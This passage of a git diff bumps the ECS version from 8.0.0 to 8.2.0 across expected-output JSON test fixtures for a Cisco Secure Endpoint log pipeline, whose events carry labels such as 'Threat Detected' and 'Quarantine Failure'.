+2966,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3052,7 +3052,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3142,7 +3142,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3222,7 +3222,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3308,7 +3308,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3388,7 +3388,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3468,7 +3468,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3548,7 +3548,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3638,7 +3638,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3724,7 +3724,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3814,7 +3814,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json index 489efad675f..4691e88d183 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json @@ -34,7 +34,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -121,7 +121,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Executed malware", @@ -203,7 +203,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -279,7 +279,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -356,7 +356,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -451,7 +451,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -545,7 +545,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -638,7 +638,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -727,7 +727,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -799,7 +799,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -875,7 +875,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -951,7 +951,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1027,7 +1027,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1103,7 +1103,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1179,7 +1179,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1255,7 +1255,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1331,7 +1331,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1407,7 +1407,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1483,7 +1483,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1559,7 +1559,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1635,7 +1635,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1711,7 +1711,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1787,7 +1787,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1863,7 +1863,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1939,7 +1939,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2015,7 +2015,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2092,7 +2092,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2189,7 +2189,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2286,7 +2286,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2387,7 +2387,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2483,7 +2483,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2555,7 +2555,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2627,7 +2627,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2699,7 +2699,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2771,7 +2771,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2847,7 +2847,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2923,7 +2923,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2999,7 +2999,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3075,7 +3075,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3152,7 +3152,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3255,7 +3255,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3353,7 +3353,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3425,7 +3425,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3498,7 +3498,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3588,7 +3588,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3682,7 +3682,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3783,7 +3783,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3880,7 +3880,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3966,7 +3966,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4056,7 +4056,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4159,7 +4159,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4252,7 +4252,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -4308,7 +4308,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -4373,7 +4373,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -4449,7 +4449,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -4525,7 +4525,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -4598,7 +4598,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -4678,7 +4678,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -4758,7 +4758,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -4841,7 +4841,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -4918,7 +4918,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -5017,7 +5017,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -5115,7 +5115,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -5191,7 +5191,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -5267,7 +5267,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -5339,7 +5339,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -5412,7 +5412,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -5492,7 +5492,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -5572,7 +5572,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -5659,7 +5659,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -5735,7 +5735,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -5811,7 +5811,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -5887,7 +5887,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -5963,7 +5963,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6039,7 +6039,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6115,7 +6115,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6191,7 +6191,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6267,7 +6267,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6343,7 +6343,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6419,7 +6419,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6495,7 +6495,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6572,7 +6572,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -6671,7 +6671,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -6768,7 +6768,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -6853,7 +6853,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -6929,7 +6929,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -7005,7 +7005,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -7081,7 +7081,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -7154,7 +7154,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7244,7 +7244,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7334,7 +7334,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7424,7 +7424,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7514,7 +7514,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7604,7 +7604,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7694,7 +7694,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7784,7 +7784,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7874,7 +7874,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7964,7 +7964,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -8058,7 +8058,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -8151,7 +8151,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json index 3f4bb69a948..6fc2b418ae4 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json @@ -38,7 +38,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -138,7 +138,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -214,7 +214,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -287,7 +287,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -377,7 +377,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -480,7 +480,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -578,7 +578,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -654,7 +654,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -727,7 +727,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -817,7 +817,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -906,7 +906,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -982,7 +982,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1058,7 +1058,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1134,7 +1134,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1206,7 +1206,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -1279,7 +1279,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1359,7 +1359,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1443,7 +1443,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1523,7 +1523,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1606,7 +1606,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1678,7 +1678,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -1751,7 +1751,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1835,7 +1835,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1922,7 +1922,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1998,7 +1998,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2074,7 +2074,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2147,7 +2147,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2227,7 +2227,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2307,7 +2307,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2391,7 +2391,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2590,7 +2590,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detection", @@ -2664,7 +2664,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2740,7 +2740,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2816,7 +2816,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2892,7 +2892,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2965,7 +2965,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3045,7 +3045,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3125,7 +3125,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3205,7 +3205,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3285,7 +3285,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3365,7 +3365,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3445,7 +3445,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3528,7 +3528,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3601,7 +3601,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3691,7 +3691,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3773,7 +3773,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3862,7 +3862,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3938,7 +3938,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -4015,7 +4015,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4109,7 +4109,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -4185,7 +4185,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -4261,7 +4261,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -4334,7 +4334,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4420,7 +4420,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4506,7 +4506,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4592,7 +4592,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4678,7 +4678,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4764,7 +4764,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4850,7 +4850,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4936,7 +4936,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -5022,7 +5022,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -5107,7 +5107,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json index 682d5b8ce67..0652bffefcb 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json @@ -37,7 +37,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -113,7 +113,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -189,7 +189,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -265,7 +265,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -341,7 +341,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -417,7 +417,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -490,7 +490,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -580,7 +580,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -677,7 +677,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -763,7 +763,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -848,7 +848,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -920,7 +920,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -992,7 +992,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -1065,7 +1065,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1155,7 +1155,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1258,7 +1258,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1359,7 +1359,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1458,7 +1458,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1560,7 +1560,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1636,7 +1636,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1708,7 +1708,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -1781,7 +1781,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1861,7 +1861,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1941,7 +1941,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2031,7 +2031,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -2111,7 +2111,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -2184,7 +2184,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2268,7 +2268,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2351,7 +2351,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2424,7 +2424,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2518,7 +2518,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2613,7 +2613,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2703,7 +2703,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2802,7 +2802,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2892,7 +2892,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2977,7 +2977,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3049,7 +3049,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3126,7 +3126,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3224,7 +3224,7 @@ } }, "ecs": { - "version": 